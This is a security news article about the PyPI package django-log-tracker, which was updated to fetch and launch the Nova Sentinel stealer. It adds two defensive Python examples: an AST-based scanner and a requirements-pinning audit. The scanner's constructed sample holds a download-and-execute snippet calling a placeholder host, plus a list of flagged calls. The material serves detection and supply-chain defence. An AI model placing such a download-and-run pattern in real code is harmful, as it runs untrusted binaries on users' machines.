A dormant package on the Python Package Index (PyPI) repository was updated nearly two years later to deliver an information stealer malware called Nova Sentinel.
The package, named django-log-tracker, was first published to PyPI in April 2022, according to software supply chain security firm Phylum, which detected an anomalous update to the library on February 21, 2024.
While the linked GitHub repository hasn't been updated since April 10, 2022, the introduction of a malicious update suggests a likely compromise of the PyPI account belonging to the developer.

Django-log-tracker has been downloaded 3,866 times to date, with the rogue version (1..4) downloaded 107 times on the day it was published. The package is no longer available for download from PyPI.
"In the malicious update, the attacker stripped the package of most of its original content, leaving only an __init__.py and example.py file behind," the company said.
The changes, simple and self-explanatory, involve fetching an executable named "Updater_1.4.4_x64.exe" from a remote server ("45.88.180[.]54"), followed by launching it using the Python os.startfile() function.
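The behaviour just described (download an executable from a hard-coded remote location, then hand it to os.startfile()) is easy to spot statically once a package is pulled apart. The following added example, which is not Phylum's tooling or anything from the django-log-tracker project, walks the AST of a module and flags calls that a logging helper has no reason to make, plus hard-coded URLs. The two sample sources, the placeholder URL and the file name are all constructed for the demonstration and are not the incident's indicators.

```python
import ast

# Constructed sample standing in for a package's __init__.py. The URL and
# file name are placeholders, not the real indicators from the incident.
SUSPICIOUS_SAMPLE = '''
import os
import urllib.request

def _update():
    target = os.path.join(os.getenv("TEMP", "/tmp"), "Updater_PLACEHOLDER.exe")
    urllib.request.urlretrieve("http://198.51.100.10/Updater_PLACEHOLDER.exe", target)
    os.startfile(target)
'''

# Constructed sample of what a logging helper is expected to look like.
BENIGN_SAMPLE = '''
import logging

def track(msg):
    logging.getLogger("tracker").info(msg)
'''

# Dotted call names that indicate download-and-execute behaviour.
FLAGGED_CALLS = {
    "os.startfile",
    "os.system",
    "subprocess.Popen",
    "subprocess.run",
    "urllib.request.urlretrieve",
    "urllib.request.urlopen",
}


def _dotted_name(node):
    """Return 'a.b.c' for an Attribute/Name chain such as os.startfile, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_source(source, filename="<memory>"):
    """Return a list of (filename, line, finding) for flagged calls and
    hard-coded http(s) URLs found in the module's source text."""
    findings = []
    tree = ast.parse(source, filename)
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in FLAGGED_CALLS:
                findings.append((filename, node.lineno, f"call to {name}"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if node.value.startswith(("http://", "https://")):
                findings.append((filename, node.lineno, f"hard-coded URL {node.value}"))
    return findings


if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        for finding in scan_source(src, label):
            print(*finding)
```

Run against a freshly downloaded sdist (for example every .py file under the unpacked archive), the scanner is a cheap pre-install gate: a release of a logging library that suddenly gains an os.startfile() call and a URL constant is exactly the kind of diff that should block an upgrade until someone reads it.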
The binary, for its part, comes embedded with Nova Sentinel, a stealer malware that was first documented by Sekoia in November 2023 as being distributed in the form of fake Electron apps on fake websites offering video game downloads.
"What is interesting about this particular case […] is that the attack vector appeared to be an attempted supply-chain attack via a compromised PyPI account," Phylum said.
"If this had been a really popular package, any project with this package listed as a dependency without a version specified or a flexible version specified in their dependency file would have pulled the latest, malicious version of this package."
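Phylum's point about unpinned and loosely pinned dependencies is the part a project can act on. The added example below, which is not Phylum's or the django-log-tracker project's code, audits a requirements file and reports which entries would have resolved to whatever PyPI served as newest. The sample file, its package names (example-log-tracker, example-http), versions and hash value are all constructed placeholders; the rules it applies are pip's own requirement syntax (exact `==` pins, `--hash=` options, `\` line continuations, `-r` includes).

```python
import re

# Constructed requirements file standing in for a project's dependency list.
# Package names, versions and the hash value are placeholders.
SAMPLE_REQUIREMENTS = """\
# constructed example, not a real project's dependency file
example-log-tracker                 # no specifier: resolver takes the newest release
example-log-tracker>=1.0            # lower bound only: also takes the newest release
example-log-tracker~=1.0            # compatible-release range: still floats within 1.x
example-log-tracker==1.0.1          # exact pin: a later upload is not installed
example-http==2.0.0 \\
    --hash=sha256:PLACEHOLDERHASH   # exact pin plus hash: content is verified too
-r other-requirements.txt           # option and include lines are skipped
"""

# Distribution name, optional [extras], then the remainder (version specifier).
NAME_RE = re.compile(r"^([A-Za-z0-9][A-Za-z0-9._-]*)(\[[^\]]*\])?(.*)$")


def logical_lines(text):
    """Yield requirement lines with comments removed and backslash continuations joined."""
    buffer = ""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()
        if line.endswith("\\"):
            buffer += line[:-1] + " "
            continue
        line = (buffer + line).strip()
        buffer = ""
        if line:
            yield line


def classify(line):
    """Return (name, specifier, status) for a requirement line, None for option lines.

    status is one of: unpinned, floating, pinned, pinned+hash.
    """
    if line.startswith("-"):
        return None
    tokens = line.split()
    spec = "".join(t for t in tokens if not t.startswith("--"))
    has_hash = any(t.startswith("--hash=") for t in tokens)
    match = NAME_RE.match(spec)
    if not match:
        return None
    name = match.group(1)
    specifier = match.group(3).split(";", 1)[0]  # drop environment markers
    clauses = [c for c in specifier.split(",") if c]
    # "==1.0.1" is exact; "==1.*" is a wildcard and still floats.
    exact = any(c.startswith("==") and not c.endswith(".*") for c in clauses)
    if not clauses:
        status = "unpinned"
    elif not exact:
        status = "floating"
    elif has_hash:
        status = "pinned+hash"
    else:
        status = "pinned"
    return name, specifier, status


def audit(text):
    """Classify every requirement in the given requirements-file text."""
    return [r for r in map(classify, logical_lines(text)) if r]


def floating_dependencies(text):
    """Names whose installed version is decided by whatever the index serves newest."""
    return [name for name, _, status in audit(text) if status in ("unpinned", "floating")]


if __name__ == "__main__":
    for name, specifier, status in audit(SAMPLE_REQUIREMENTS):
        print(f"{status:12} {name}{specifier}")
```

Only the last two sample entries would have been safe in the scenario Phylum describes: an exact pin keeps a poisoned newer release out of the build, and adding `--hash=` also catches a re-upload of the same version number with different contents.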
Some parts of this post are sourced from:
thehackernews.com